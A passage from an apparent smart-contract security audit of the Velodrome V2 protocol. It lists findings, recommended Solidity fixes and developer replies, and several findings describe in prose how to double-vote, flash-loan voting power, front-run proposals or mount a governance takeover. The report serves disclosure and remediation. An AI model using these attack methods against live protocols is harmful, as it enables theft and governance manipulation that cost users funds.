prob remove it if setting a higher MINIMUM_K. The reason to enforce the 1:1 ratio is just a precautions check. It's when lp can contribute to max invariant k with minimum tokens; the issue of rounding error should be mildest. As for MINIMUM_K, 10e9 would be a safe one. The invariant can decrease in some cases. The x3y+y3x AMM is quite unique. This is the less-studied curve among all popular AMM. We will revisit this issue and "the decreased invariant one" and figure out a tighter safe bound after going through the other part of the protocol. At the time, I tend to keep the security margin and set a higher MINIMUM_K. Velodrome: Fixed in commit 59f9c1. 
Spearbit: Verified. 5.3 Medium Risk +5.3.1 Certain functions are unavailable after opting in to the "auto compounder Severity: Medium Risk Context: AutoCompounder.sol Description: Certain features (e.g., delegation, governance voting) of a veNFT would not be available if the veNFT is transferred to the auto compounder. Let x be a managed veNFT. When an "auto compounder" is created, ownership of x is transferred to the AutoCom- pounder contract, and any delegation within x is cleared. The auto compounder can perform gauge weight voting using x via the provided AutoCompounder.vote function. However, it loses the ability to perform any delegation with x because the AutoCompounder contract does not contain a function that calls the VotingEscrow.delegate function. Only the owner of x, the AutoCompounder contract, can call the VotingEscrow.delegate function. x also loses the ability to vote on governance proposals as the existing AutoCompounder contract does not support this feature. Once the owner of the managed NFTs has opted in to the "auto compounder," it is not possible for them to subsequently "opt out." Consequently, if they need to exercise delegation and governance voting, they will be unable to do so, exacerbating the impact. 17 Recommendation: Most users would expect their managed NFTs to function similarly after moving them to the "auto compounder" with the extra benefit of automatically compounding the rewards. Thus, it is recommended that any features available to a managed NFT should also be ported over to the "auto compounder". Otherwise, document these limitations so that the users would be aware of this before using the "auto compounder" Velodrome: The design to prevent voting/delegation from the managed veNFT ((m)veNFT) is intentional. There is potential for Velodrome governance abuse by an (m)veNFT that gains too much voting power from its' underlying locked veNFTs. We completed similar research for LP delegation and determined it is better for the protocol to prevent overweight voting from entities who have voting power not intentionally given to them. In this case, a user would be locking up their veNFT with the intention of receiving the auto-compounding returns, not delegating their voting rights away. Spearbit: Acknowledged. +5.3.2 Claimable gauge distributions are locked when killGauge is called Severity: Medium Risk Context: Voter.sol#L297-L311 Description: When a gauge is killed, the claimable[_gauge] key value is cleared. Because any rewards received by the Voter contract are indexed and distributed in proportion to each pool's weight, this claimable amount is permanently locked within the contract. Recommendation: Consider returning the claimable amount to the Minter contract. It is important to note that votes will continue to persist on the killed gauge, so it may also make sense to wipe these votes too. Otherwise, the killed gauge will continue to accrue rewards from the Minter contract. Velodrome: We intend on returning claimable to Minter. I think clearing votes is not possible without a lot of changes to the code as there is no way of fetching which nfts voted for a specific pool without iterating through all of them and this may have unexpected side effects with reset, so I think the best that can be done is to communicate that the gauge has been killed. Velodrome: Fixed in commit e4b230. Spearbit: The fix will send a gauge's claimable funds back to the Minter contract in killGauge(). 
However, it does not handle the case where residual votes on a pool will continue to allocate minted tokens to a gauge. Velodrome: Is it possible for the mitigation to be complete by returning funds in updateFor(address _gauge) as well? By complete I mean addressing the edge case that votes remain on the pool, and thus causing minting supply to be trapped. That way, even if there are residual votes (_supplied), any claimable that exists is returned to the minter instead of being trapped in Voter. Note that updateFor is only callable once per week as the index value is only updated once per week when update_period is called. Something like this: if (_delta > 0) { uint256 _share = (uint256(_supplied) * _delta) / 1e18; // add accrued difference for each supplied token ,! if (isAlive[_gauge]) { claimable[_gauge] += _share; } else { IERC20(rewardToken).safeTransfer(minter, _share); } } Spearbit: Agreed that the residual votes issue would be remediated if updateFor() was updated to transfer back minted tokens if the gauge has been killed. 18 +5.3.3 Bribe and fee token emissions can be gamed by users Severity: Medium Risk Context: Voter.sol#L154-L224 Description: A user may vote or reset their vote once per epoch. Votes persist across epochs and once a user has distributed their votes among their chosen pools, the poke() function may be called by any user to update the target user's decayed veNFT token balance. However, the poke() function is not hooked into any of the reward distribution contracts. As a result, a user is incentivized to vote as soon as they create their lock and avoid re-voting in subsequent epochs. The amount deposited via Reward._deposit() does not decay linearly as how it is defined under veToken mechanics. Therefore, users could continue to earn trading fees and bribes even after their lock has expired. Simultaneously, users can poke() other users to lower their voting weight and maximize their own earnings. Recommendation: Re-designing the FeesVotingReward and BribeVotingRewards contracts may be worthwhile to decay user deposits automatically. Velodrome: Given that there are a lot of assumptions around the severity of the attack (i.e. how likely a user would wish to do this, given competing incentives around maximizing returns and the risk that they can be poked at any time, etc), we have elected to go with a solution that involves incentivizing the poking of tokenIds that are passively voting for too long. It will look something like this. On the last day of every epoch, any tokenId that is over some value, that has been passively voting for some time, will be incentivized to be poked. This will amend down that NFT's contribution and discourage long-term passive behavior as well as abuse. The parameters ("some value" and "some time") will be mutable and can be modified to reduce the cost of incentivization. Some initial ideas of values would be to poke any NFT worth more than 1_000 VELO that has passively voted for 4 weeks. We will assess the severity of the issue in practice and make changes accordingly. Spearbit: Acknowledged. While it is true that users are incentivized to poke other users who are passively voting on pools for too long, this mechanism is still inefficient and does not feasibly scale with users. 
+5.3.4 Desync between bribes being paid and gauge distribution allows voters to receive bribes without triggering emissions Severity: Medium Risk Context: Voter.sol#L448 Description: Because of the fact that BribeVotingReward will award bribes based on the voting power at EPOCH_- END - 1, but Minter.update_period() and Voter.distribute() can be called at a time after, some voters may switch their vote before their weight influences emissions, causing the voters to receive bribes, but the bribing protocols to not have their gauge receive the emissions. For example: Let's say as project XYZ I'm going to bribe for 3 weeks in a row and it will be the best yield offered What you could do due to the discrepancy between distribute and the rewards is: • You can vote for 3 weeks • As soon as the 3rd vote period has ended (Reward epoch), you can vote somewhere else The 3rd vote will: • Award you with the 3rd week epoch of rewards • Can be directed towards a new Gauge, causing the distribution to not be in-line with the Bribes The desync between: • Bribes being Paid (EPOCH_END - 1) and • distribution happening some-time after, EPOCH_END + X 19 Means that some bribes can get the reward without "reciprocating" with their vote weight. Velodrome: Discussed this with the team. We acknowledge that it is an issue, although we do think that economic incentives encourage voters to vote later during the epoch (as they will seek to profit maximize, this was discussed elsewhere in another issue). Due to the potential risk of loss for partners, we considered a simple mitigation of preventing voting in another window (an hour long post epoch flip, similar to the votium-style time window) to allow distributions to take place. Distributions are an automation target and will be incentivized down the track. I have thought about it and have also considered an option where users passively call distribute prior to voting (e.g. perhaps in reset but it appears it does not mitigate the issue as it requires ALL pools to be distributed (at a fixed total voting weight supply), prior to allowing votes to change. Thus, I continue to think that the simplest fix is to implement a post-epoch voting window of an hour to allow distributions to take place. Fixed in commit b517ab. Spearbit: Verified. Agree that allowing 1 hour post-voting window for protocols to trigger distribute is an appropriate mitigation. +5.3.5 Compromised or malicious owner can drain the VotingEscrow contract of VELO tokens Severity: Medium Risk Context: VotingEscrow.sol#L119-L122, FactoryRegistry.sol#L72-L82 Description: The FactoryRegistry contract is an Ownable contract with the ability to control the return value of the managedRewardsFactory() function. As such, whenever createManagedLockFor() is called in VotingEscrow, the FactoryRegistry contract queries the managedRewardsFactory() function and subsequently calls createRe- wards() on this address. If ownership of the FactoryRegistry contract is compromised or malicious, the createRewards() external call can return any arbitrary _lockedManagedReward address which is then given an infinite token approval. As a result, it's possible for all locked VELO tokens to be drained and hence, this poses a significant centralization risk to the protocol. Recommendation: Avoid using infinite approvals unless the target is guaranteed to be deterministic and im- mutable. Consider modifying the increaseAmount() and all other instances where IReward(_lockedManage- dReward).notifyRewardAmount() is called. 
The proposed fix may look like the following: function createManagedLockFor(address _to) external nonReentrant returns (uint256 _mTokenId) { ... (address _lockedManagedReward, address _freeManagedReward) = IManagedRewardsFactory( IFactoryRegistry(factoryRegistry).managedRewardsFactory() ).createRewards(voter); IERC20(token).approve(_lockedManagedReward, type(uint256).max); ... - } function increaseAmount(uint256 _tokenId, uint256 _value) external nonReentrant { ... if (_escrowType == EscrowType.MANAGED) { // increaseAmount called on managed tokens are treated as locked rewards address _lockedManagedReward = managedToLocked[_tokenId]; IERC20(token).approve(_lockedManagedReward, _value); IReward(_lockedManagedReward).notifyRewardAmount(address(token), _value); + } } Velodrome: Fixed in commit 6726f2. Spearbit: Verified. 20 +5.3.6 Unsafe casting in RewardsDistributor leads to underflow of veForAt Severity: Medium Risk Context: RewardsDistributor.sol#L121-L127 Description: Solidity does not revert when casting a negative number to uint. Instead, it underflows to a large number. In the RewardDistributor contract, the balance of a token at specific time is calculated as follows IVotingEscrow.Point memory pt = IVotingEscrow(_ve).userPointHistory(_tokenId, epoch); Math.max(uint256(int256(pt.bias - pt.slope * (int128(int256(_timestamp - pt.ts))))), 0); This supposes to return zero when the calculated balance is a negative number. However, it underflows to a large number. This would lead to incorrect reward distribution if third-party protocols depend on this function, or when further updates make use of this codebase. Recommendation: Recommend following other parts of the codebase and returning zero for a negative number. int256 result = int256(pt.bias - pt.slope * int128(int256(_timestamp - pt.ts))); if (result < 0) return 0; return uint256(result); Also, recommend applying the fix to other parts of rewardDistributor RewardsDistributor.sol#L196 RewardsDis- tributor.sol#L254 RewardsDistributor.sol#L145 Velodrome: Fixed in commit 6485ef. Spearbit: Verified. +5.3.7 Proposals can be griefed by front-running and canceling Severity: Medium Risk Context: VeloGovernor.sol#L19 Description: Because the Governor uses OZ's Implementation, a griefter can front-run a valid proposal with the same settings and then immediately cancel it. You can avoid the grief by writing a macro contract that generates random descriptions to avoid the front-run. See: code-423n4/2022-09-nouns-builder-findings#182. Recommendation: Add proposer to the proposalHash() function to avoid griefing. Velodrome: Fixed in commit b2f8f2. Spearbit: Verified. +5.3.8 pairFor does not correctly sort tokens when overriding for SinkConverter Severity: Medium Risk Context: Router.sol#L59-L90 Description: The router will always search for pairs by sorting tokenA and TokenB. Notably, for the velo and Velo2 pair, the Router will not perform the sorting 21 //Router.sol#L69-L73 if (factory == defaultFactory) { if ((tokenA == IPairFactory(defaultFactory).velo()) && (tokenB == ,! IPairFactory(defaultFactory).veloV2())) { return IPairFactory(defaultFactory).sinkConverter(); } } Meaning that the pair for Velo -> Velo2 will be the Sink but the pair for Velo2 -> Velo will be some other pair. Additionally, you can front-run a call to setSinkConverter() by calling createPair() with the same parameters. How- ever, the respective values for getPair() would be overwritten with the sinkConverter address. 
Velodrome: Fixed in commit b2f8f2.

Spearbit: Verified.

+5.3.8 pairFor does not correctly sort tokens when overriding for SinkConverter

Severity: Medium Risk

Context: Router.sol#L59-L90

Description: The router will always search for pairs by sorting tokenA and tokenB. Notably, for the VELO and VELO v2 pair, the Router will not perform the sorting:

//Router.sol#L69-L73
if (factory == defaultFactory) {
    if ((tokenA == IPairFactory(defaultFactory).velo()) && (tokenB == IPairFactory(defaultFactory).veloV2())) {
        return IPairFactory(defaultFactory).sinkConverter();
    }
}

This means that the pair for Velo -> Velo2 will be the Sink, but the pair for Velo2 -> Velo will be some other pair. Additionally, you can front-run a call to setSinkConverter() by calling createPair() with the same parameters. However, the respective values for getPair() would be overwritten with the sinkConverter address. This could lead to some weird and unexpected behaviour, as we would still have an invalid Pair contract for the v1 and v2 VELO tokens.

Recommendation: It may be best to enforce the one-way direction but sort the pair to ensure that all Velo -> Velo2 swaps go to the Sink.

Velodrome: Fix implemented in commit b0adb4. The front-run still exists where a legit VELO/VELO V2 token pair could be created, but from the router perspective, once PairFactory.setSinkConverter() is called, the invalid created pair would be ignored.

Spearbit: Verified.

+5.3.9 Inconsistency between balanceOfNFT, balanceOfNFTAt and _balanceOfNFT functions

Severity: Medium Risk

Context: VotingEscrow.sol#L985, VotingEscrow.sol#L976

Description: The balanceOfNFT function implements a flash-loan protection that returns zero voting balance if ownershipChange[_tokenId] == block.number. However, this was not consistently applied to the balanceOfNFTAt and _balanceOfNFT functions.

VotingEscrow.sol
function balanceOfNFT(uint256 _tokenId) external view returns (uint256) {
    if (ownershipChange[_tokenId] == block.number) return 0;
    return _balanceOfNFT(_tokenId, block.timestamp);
}

As a result, Velodrome or external protocols calling the balanceOfNFT and balanceOfNFTAt external functions will receive different voting balances for the same veNFT depending on which function they called. Additionally, the internal _balanceOfNFT function, which does not have flash-loan protection, is called by the VotingEscrow.getVotes function to compute the voting balance of an account. The VotingEscrow.getVotes function appears not to be used in any in-scope contracts; however, it might be utilized by some external protocols or off-chain components to tally the votes. If that is the case, a malicious user could flash-loan the veNFTs to inflate the voting balance of their account.

Recommendation: If the requirement is to have all newly transferred veNFTs (ownershipChange[_tokenId] == block.number) have zero voting balance to prevent someone from flash-loaning veNFTs to increase their voting balance, the flash-loan protection should be consistently implemented across all the related functions.

Velodrome: I think the current status of this issue is that once timestamp governance is merged in, block-based balance functions will be removed as the contract will adopt timestamps as its official "clock" (see EIP6372). Once it is merged, we will assess the consistency of ownership_change on the various fns.

Spearbit: Acknowledged.

+5.3.10 Nudge check will break once limit is reached

Severity: Medium Risk

Context: Minter.sol#L75

Description: Because you're checking both sides, once oldRate reaches the MAX_RATE, every new nudge call will revert. This means that if _newRate ever gets to MAXIMUM_TAIL_RATE or MINIMUM_TAIL_RATE, nudge will stop working.

Recommendation: It's probably best to let the value update and then cap it, without a require. Any proposal that goes over the cap can be allowed to go through, but be forced to be idempotent, e.g. newRate = rate + NUDGE > maxRate ? maxRate : rate + NUDGE for the upside, and newRate = rate == NUDGE ? 0 : rate - NUDGE for the decrease.
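A sketch of the clamped update (hypothetical names, including the _increase flag; the adopted fix keeps a 1 BPS floor rather than letting the rate reach 0):

// Sketch: let the proposal pass but clamp the resulting rate, so nudge
// keeps working once a boundary has been reached.
uint256 _newRate = _increase
    ? (oldRate + NUDGE > MAXIMUM_TAIL_RATE ? MAXIMUM_TAIL_RATE : oldRate + NUDGE)
    : (oldRate > MINIMUM_TAIL_RATE + NUDGE ? oldRate - NUDGE : MINIMUM_TAIL_RATE);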
Velodrome: Fixed in commit 42ee2c. The Velodrome team has modified the downside boundary code to keep it consistent with the upper boundary code. It is noted that the downside boundary is at 1 BPS, as there must always be some emissions.

Spearbit: Mitigation LGTM:

• Removed the require (prevents reverts).
• If above the cap, cap to max.
• If below the lower cap, bring back to 1, which avoids the underflow as long as NUDGE is 1, which is fine.

Spearbit: Verified.

+5.3.11 ownershipChange can be sidestepped

Severity: Medium Risk

Context: VotingEscrow.sol#L137-L138

Description: The check there is to prevent adding to a managed NFT after a transfer or creation:

require(ownershipChange[_tokenId] != block.number, "VotingEscrow: flash nft protection");

However, it doesn't prevent adding to and removing from other managed tokens, merging, or splitting. Because ownershipChange is updated exclusively in _transferFrom, we can sidestep it being set by splitting the lock into a new one, which will not carry the flag.

Recommendation: Consider whether the lock is necessary and add additional checks to prevent users from sidestepping it. Alternatively, the lock functionality may be removed to focus on maintaining the underlying invariants.

Velodrome: Fixed in commit 02e0bc.

Spearbit: Verified.

+5.3.12 The fromBlock variable of a checkpoint is not initialized

Severity: Medium Risk

Context: VotingEscrow.sol#L1353, VotingEscrow.sol#L1256

Description: A checkpoint contains a fromBlock variable which stores the block number at which the checkpoint is created.

/// @notice A checkpoint for marking delegated tokenIds from a given block
struct Checkpoint {
    uint256 fromBlock;
    uint256[] tokenIds;
}

However, it was found that the fromBlock variable of a checkpoint was not initialized anywhere in the codebase. Therefore, any function that relies on the fromBlock of a checkpoint will break. The VotingEscrow._findWhatCheckpointToWrite and VotingEscrow.getPastVotesIndex functions were found to rely on the fromBlock variable of a checkpoint for computation. The following is a list of functions that call these two affected functions:

_findWhatCheckpointToWrite -> _moveTokenDelegates -> _transferFrom
_findWhatCheckpointToWrite -> _moveTokenDelegates -> _mint
_findWhatCheckpointToWrite -> _moveTokenDelegates -> _burn
_findWhatCheckpointToWrite -> _moveAllDelegates -> _delegate -> delegate/delegateBySig
getPastVotesIndex -> getTokenIdsAt
getPastVotesIndex -> getPastVotes -> GovernorSimpleVotes._getVotes

Instance 1 - VotingEscrow._findWhatCheckpointToWrite function

The VotingEscrow._findWhatCheckpointToWrite function verifies if the fromBlock of the latest checkpoint of an account is equal to the current block number. If true, the function will return the index number of the last checkpoint.

function _findWhatCheckpointToWrite(address account) internal view returns (uint32) {
    uint256 _blockNumber = block.number;
    uint32 _nCheckPoints = numCheckpoints[account];
    if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) {
        return _nCheckPoints - 1;
    } else {
        return _nCheckPoints;
    }
}

As such, this function does not work as intended and will always return the index of a new checkpoint.

Instance 2 - VotingEscrow.getPastVotesIndex function

The VotingEscrow.getPastVotesIndex function relies on the fromBlock of the latest checkpoint for optimization purposes. If the requested block number is the most recently updated checkpoint, it will return the latest index immediately and skip the binary search. Since the fromBlock variable is not populated, the optimization will not work.
function getPastVotesIndex(address account, uint256 blockNumber) public view returns (uint32) {
    uint32 nCheckpoints = numCheckpoints[account];
    if (nCheckpoints == 0) {
        return 0;
    }
    // First check most recent balance
    if (_checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) {
        return (nCheckpoints - 1);
    }
    // Next check implicit zero balance
    if (_checkpoints[account][0].fromBlock > blockNumber) {
        return 0;
    }
    uint32 lower = 0;
    uint32 upper = nCheckpoints - 1;
    while (upper > lower) {
        uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow
        Checkpoint storage cp = _checkpoints[account][center];
        if (cp.fromBlock == blockNumber) {
            return center;
        } else if (cp.fromBlock < blockNumber) {
            lower = center;
        } else {
            upper = center - 1;
        }
    }
    return lower;
}

Recommendation: Initialize the fromBlock variable of the checkpoint in the codebase.

Velodrome: Fixed in commit a670bf.

Spearbit: Verified.

+5.3.13 Double voting by shifting the voting power between managed and normal NFTs

Severity: Medium Risk

Context: VotingEscrow.sol#L165

Description: Owners of normal NFTs and managed NFTs could potentially collude to double vote, which affects the fairness of the gauge weight voting. A group of malicious veNFT owners could exploit this and use the inflated voting balance to redirect the VELO emission to gauges where they have a vested interest, causing losses to other users. The following shows that it is possible to increase the weight of a pool by 2000 with a 1000 voting balance within a single epoch by shifting the voting power between managed and normal NFTs.

For simplicity's sake, assume the following:

• Alice is the owner of a managed NFT (tokenID=888).
• Bob is the owner of a normal NFT (tokenID=999).
• Alice's managed NFT (tokenID=888) only consists of one (1) locked-up normal NFT (tokenID=999) that belongs to Bob.

The following steps are executed within the same epoch. At the start, the state is as follows:

• Voting power of Alice's managed NFT (tokenID=888) is 1000.
  – The 1000 voting power came from the normal NFT (tokenID=999) during the deposit.
  – weights[_tokenId][_mTokenId] = _weight | weights[999][888] = 1000;
• Voting power of Bob's normal NFT (tokenID=999) is zero (0).
• Weight of Pool X = 0.

Alice calls the Voter.vote function with her managed NFT (tokenID=888) and increases the weight of Pool X by 1000. Subsequently, lastVoted[_tokenId] = _timestamp at Line 222 in the Voter.vote function will be set, and the onlyNewEpoch modifier will ensure Alice cannot use the same managed NFT (tokenID=888) to vote again in the current epoch. However, Bob could call VotingEscrow.withdrawManaged to withdraw his normal NFT (tokenID=999) from the managed NFT (tokenID=888). Within the function, it will call the internal _checkpoint function to "transfer" the voting power from the managed NFT (tokenID=888) to the normal NFT (tokenID=999). At this point, the state is as follows:

• Voting power of Alice's managed NFT (tokenID=888) is zero (0).
• Voting power of Bob's normal NFT (tokenID=999) is 1000.
• Weight of Pool X = 1000.

Bob calls the Voter.vote function with his normal NFT (tokenID=999) and increases the weight of Pool X by 1000. Since the normal NFT (tokenID=999) has not voted in the current epoch, it is allowed to vote. The weight of Pool X becomes 2000.

It was observed that a mechanism is in place to punish and disincentivize malicious behaviors from a managed NFT owner.
The protocol's emergency council could deactivate managed NFTs involved in malicious activities via the VotingEscrow.setManagedState function. In addition, the ability to create a managed NFT is restricted to an authorized manager and the protocol's governor. These factors help to mitigate some risks related to this issue to a certain extent.

Recommendation: Consider calling the Voter.poke function against the managed NFT (e.g. tokenID=888) automatically within the VotingEscrow.withdrawManaged function, so that the weight provided to the pools by a managed NFT (e.g. tokenID=888) will be reduced by the voting balance of the normal NFT being withdrawn.
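A sketch of the recommended hook (hypothetical placement at the end of VotingEscrow.withdrawManaged):

// Sketch: re-cast the managed NFT's existing votes at its reduced balance,
// so pool weights no longer include the freshly withdrawn voting power.
IVoter(voter).poke(_mTokenId);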
Velodrome: Fixed in commit 3926ee.

Spearbit: Verified.

+5.3.14 MetaTX is using the incorrect Context

Severity: Medium Risk

Context: Gauge.sol#L12

Description: Throughout the codebase, the code uses Context for _msgSender(). The implementation chosen will resolve each _msgSender() to msg.sender, which is inconsistent with the goal of allowing MetaTX.

Recommendation: Replace the import of Context with ERC2771Context. Also see: guide-metatx#compile-using-hardhat.
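For reference, a minimal sketch of wiring in OpenZeppelin's ERC2771Context (the real Gauge constructor takes more parameters):

import {ERC2771Context} from "@openzeppelin/contracts/metatx/ERC2771Context.sol";

contract Gauge is ERC2771Context {
    constructor(address _trustedForwarder) ERC2771Context(_trustedForwarder) {}

    function sketch() external view returns (address) {
        // _msgSender() now recovers the original signer for calls relayed
        // through the trusted forwarder instead of returning the forwarder.
        return _msgSender();
    }
}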
Velodrome: Fixed in commit 84a2d8.

Spearbit: Verified.

+5.3.15 depositFor function should be restricted to approved NFT types

Severity: Medium Risk

Context: VotingEscrow.sol#L807

Description: The depositFor function was found to accept NFTs of all types (normal, locked, managed) without restriction.

function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant {
    LockedBalance memory oldLocked = _locked[_tokenId];
    require(_value > 0, "VotingEscrow: zero amount");
    require(oldLocked.amount > 0, "VotingEscrow: no existing lock found");
    require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw");
    _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE);
}

Instance 1 - Anyone can call depositFor against a locked NFT

Users should not be allowed to increase the voting power of a locked NFT by calling the depositFor function, as locked NFTs are not supposed to vote. Thus, any increase in the voting balance of locked NFTs will not increase the gauge weight, and as a consequence, the influence and yield of the deposited VELO will be diminished. In addition, the locked balance will be overwritten when the veNFT is later withdrawn from the managed veNFT, resulting in a loss of funds.

Instance 2 - Anyone can call depositFor against a managed NFT

Only the RewardsDistributor.claim function should be allowed to call the depositFor function against a managed NFT, to process claimed rebase rewards and to compound the rewards into the LockedManagedReward contract. However, anyone could also increase the voting power of a managed NFT directly by calling depositFor with the tokenId of a managed NFT, which breaks the invariant.

Recommendation: Evaluate the types of NFTs (normal, locked, or managed) that can be used with the depositFor function within the protocol. Based on the current design of the protocol:

• Normal NFT - Anyone can call depositFor against a normal NFT.
• Locked NFT - No one should be able to call depositFor against a locked NFT.
• Managed NFT - Only the RewardsDistributor.claim function is allowed to call depositFor against a managed NFT for processing rebase rewards.

Consider implementing the following additional check to disallow anyone from calling the depositFor function against a locked NFT:

function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant {
+   EscrowType _escrowType = escrowType[_tokenId];
+   require(_escrowType != EscrowType.LOCKED, "VotingEscrow: Not allowed to call depositFor against Locked NFT");
    LockedBalance memory oldLocked = _locked[_tokenId];
    require(_value > 0, "VotingEscrow: zero amount");
    require(oldLocked.amount > 0, "VotingEscrow: no existing lock found");
    require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw");
    _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE);
}

Sidenote: Additionally, the depositFor function should be modified to handle an incoming managed NFT's rebase rewards from the RewardsDistributor. Refer to the recommendation in "Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward".

Velodrome: Fixed in commit e98472.

Spearbit: Verified.

+5.3.16 Lack of vetoer can lead to 51% attack

Severity: Medium Risk

Context: VeloGovernor.sol, EpochGovernor.sol

Description: Veto power is important functionality in a governance system in order to protect against malicious proposals. However, there is no vetoer in VeloGovernor; this might lead to Velodrome unintentionally losing its veto power and being open to a 51% attack. With a 51% attack, a malicious actor can change the governor in the Voter contract, or bypass the token whitelist, adding a new gauge with a malicious token.

References:

• dialectic.ch/editorial/nouns-governance-attack-2
• code4rena.com/reports/2022-09-nouns-builder/#m-11-loss-of-veto-power-can-lead-to-51-attack

Recommendation: It is recommended to add a vetoer with two-step validation, and to add a function to execute a veto. An example of a veto function (adapt the code before using it):

function veto(bytes32 _proposalId) external {
    // Ensure the caller is the vetoer
    require(msg.sender == vetoer, "Only vetoer");
    ProposalState status = state(_proposalId);
    // Ensure the proposal has not been executed
    require(
        status != ProposalState.Canceled && status != ProposalState.Expired && status != ProposalState.Executed,
        "Proposal not active"
    );
    // Get the pointer to the proposal
    Proposal storage proposal = proposals[_proposalId];
    // Update the proposal as vetoed
    proposal.vetoed = true;
    emit ProposalVetoed(_proposalId);
}

Velodrome: Acknowledged, given the ability of this to severely disrupt normal operation of the protocol. I think the simplest way to implement this would be to use the _cancel function provided in Governor. We will also add the ability to set/change a vetoer, which will most likely be set to emergencyCouncil (will ask for feedback around this). Are there any recommendations regarding parameters that should be set, e.g. the appropriate quorum fraction?

Spearbit: Additional considerations: especially during the migration from V1 to V2, there will be a period in which it is very cheap to attack the Governor without a vetoer. The first attack could be as simple as raising the quorum (which may force the V1 price to rise as it becomes more urgent to migrate to V2). This may be used, for example, to enable new tokens which are malicious/privileged, with the goal of obtaining emissions from V2 in perpetuity and keeping enough of a head start to make it impossible for others to catch up. Set of attacks:

• Whitelist a privileged pair (to steal emissions).
• Raise the quorum to make it harder / impossible to catch up.
• Set the governor to an EOA / hijack it.
• Create a managed lock and refuse to create one for others.

Velodrome: Fixed in commit 64fe60.

Spearbit: Verified.

5.4 Low Risk

+5.4.1 Compromised or malicious owner can siphon rewards from the Voter contract

Severity: Low Risk

Context: FactoryRegistry.sol#L35-L69, Voter.sol#L272-L279

Description: The createGauge() function takes a _gaugeFactory parameter which is checked to be approved by the FactoryRegistry contract. However, the owner of the FactoryRegistry contract can approve any arbitrary factory, hence the return value of the IGaugeFactory(_gaugeFactory).createGauge() call may be an EOA which steals rewards every time notifyRewardAmount() is called.

Recommendation: Consider modifying the distribute() function to only approve the available claimable token amount. The createGauge() function should also not approve an infinite amount for any potentially untrusted address. The proposed fix may look like the following:

function createGauge(
    address _pairFactory,
    address _votingRewardsFactory,
    address _gaugeFactory,
    address _pool
) external nonReentrant returns (address) {
    ...
    require(
        IFactoryRegistry(factoryRegistry).isApproved(_pairFactory, _votingRewardsFactory, _gaugeFactory),
        "Voter: factory path not approved"
    );
    (address _feeVotingReward, address _bribeVotingReward) = IVotingRewardsFactory(_votingRewardsFactory)
        .createRewards(rewards);
    address _gauge = IGaugeFactory(_gaugeFactory).createGauge(_pool, _feeVotingReward, rewardToken, isPair);
-   IERC20(rewardToken).approve(_gauge, type(uint256).max);
    ...
}

function distribute(address _gauge) public nonReentrant {
    IMinter(minter).update_period();
    _updateFor(_gauge); // should set claimable to 0 if killed
    uint256 _claimable = claimable[_gauge];
    if (_claimable > IGauge(_gauge).left() && _claimable / DURATION > 0) {
        claimable[_gauge] = 0;
+       IERC20(rewardToken).approve(_gauge, _claimable);
        IGauge(_gauge).notifyRewardAmount(_claimable);
        emit DistributeReward(_msgSender(), _gauge, _claimable);
    }
}

Velodrome: Fixed in commit 6726f2.

Spearbit: Verified.
+5.4.2 Missing nonReentrant modifier on a state changing checkpoint function

Severity: Low Risk

Context: VotingEscrow.sol#L802-L804

Description: The checkpoint() function will call the internal _checkpoint() function, which ultimately fills the point history and potentially updates the epoch state variable.

Recommendation: Add the nonReentrant modifier to the external checkpoint() function.

Velodrome: Fixed in commit 9317ea.

Spearbit: Verified.

+5.4.3 Close to half of the trading fees may be paid one epoch late

Severity: Low Risk

Context: Gauge.sol#L71

Description: Due to how left() is implemented in Reward (returning the total amount of rewards for the epoch), _claimFees() will not queue rewards until the new fees are greater than the current ones for the epoch. This can cause the check to be false for values that are up to half minus one reward. Consider the following example:

• In the first second of a new epoch, we add 100 rewards.
• For the rest of the epoch, we accrue 99.99 rewards.
• The check is always false; the 99 rewards will not be added to this epoch, despite having been accrued during it.

Recommendation: Document the change or consider always calling notifyRewardAmount() when fees / DURATION > 0.

Velodrome: I think this issue is a bit challenging to address, as fee generation is unpredictable and could be influenced by exogenous factors. In general, bribes and emissions will be fairly consistent on a week-to-week basis, but fees could spike one week (due to a material market event resulting in increased interest) and then decline in other weeks. I think the code as it is helps smooth fees across epochs (as it prevents too many fees from accumulating over a single epoch), so the best we can do is likely document the change.

Spearbit: Acknowledged.

+5.4.4 Not synced with Epochs

Severity: Low Risk

Context: Gauge.sol#L209

Description: If there are enough delays in calling the notifyRewardAmount() function, a full desync can happen.

Recommendation: It may be ideal to queue rewards to the next epoch to avoid any form of grief/race condition. That said, this may create negative externalities, so perhaps the check could be:

• If in the first half of the epoch, queue rewards to the current epoch.
• If in the second half of the epoch, queue rewards to the next epoch.

Velodrome: I am worried about edge cases where a pool may fall into disuse and then be used again. It looks like we can mitigate this by setting periodFinish to the end of the epoch / start of the next epoch. I am aware that this will encourage users to call Voter.distribute() late, but the plan for this function is to automate it so that it is called at the beginning of every epoch.

Spearbit: Agree that it makes sense to align periodFinish with the start of the following epoch to avoid any time drift. But I think this change would actually make things more unfair: as stated above, users are incentivized to call Voter.distribute() late into the epoch to maximize rewardRate.

Velodrome: Voter.distribute() is a target for keeper automation, which will make it less likely that it will be called late. It appears that periodFinish could slightly inflate gauge rewards if the second notifyRewardAmount call is closer to the start of its relative epoch than the prior notifyRewardAmount. How?

• Assume notifyRewardAmount (epoch 1) is called 10 seconds after the start of epoch 1.
  – periodFinish is now set to 10 seconds after the start of epoch 2.
• notifyRewardAmount (epoch 2) is called 1 second after the start of epoch 2.
  – timestamp < periodFinish by 9 seconds, therefore rewardRate adds the leftover and the amount deposited.

I believe what would be best is to always set periodFinish to the epoch start of the next epoch so that this inflation does not happen.

Velodrome: Fixed in commit a336f7.

Spearbit: Verified.
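A sketch of that alignment (hypothetical placement inside Gauge.notifyRewardAmount):

// Sketch: anchor periodFinish to the next epoch boundary instead of
// block.timestamp + DURATION, so a late notification cannot shift the
// window and double-count leftover rewards.
periodFinish = block.timestamp - (block.timestamp % DURATION) + DURATION;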
+5.4.5 Dust losses in notifyRewardAmount

Severity: Low Risk

Context: Gauge.sol#L196

